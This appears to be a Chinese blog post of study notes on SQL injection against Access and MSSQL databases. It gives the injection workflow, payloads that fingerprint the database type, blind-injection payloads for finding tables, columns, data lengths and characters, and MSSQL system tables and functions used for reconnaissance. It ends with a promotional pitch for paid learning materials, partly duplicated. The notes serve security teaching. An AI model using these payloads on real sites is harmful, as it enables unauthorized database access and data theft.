2、access数据库
(1)没有库,没有端口
(2)结构:表–》字段–》数据
3、注入流程:
- 判断类型
- 判断表名:遍历、爆破
- 判断列名
- 判断列名下的数据长度
- 查出数据
4、判断是什么数据库
and exists (select * from msysobjects)>0 access
and exists (select * from sysobjects)>0 mssql
5、破解
(1)判断类型:确定是字符型还是数字型
(2)获取表名:and+exists+(select+*+from+表名)
(3)获取列名:and+exists+(select+列名+from+表名)
(4)获取数据长度:and+(select+top+1+len(列名)+from+表名)>5
(5)获取数据:and+(select+top+1+asc(substr(列名,1,2))+from+表名)>110
6、联合注入:需要知道具体表名
参考资料:https://www.cnblogs.com/drkang/p/8627794.html
二、mssql注入
注:严格区分数字型和字符型
1、特殊数据库:master
2、表:
- sysdatabases:master库中,保存所有库名
- syobjects:每个数据库都有,保存数据库中的所有表
- syscolumns:每个数据库都有,保存所有表的字段名
3、思路
- 判断类型
- 获取数据库
- 获取表
- 获取字段数
- 获取数据
4、常用(与MySQL不同)
- db_name():获取当前数据库名
- host_name():获取计算机名
- user:获取用户名
- current_user:获取当前数据库的用户名
- substring:字符串截取函数
- @@version:查看数据库版本
- char:ASCII转字符函数
5、联合查询注入
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
我获取!!**](https://bbs.csdn.net/topics/618653875)
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
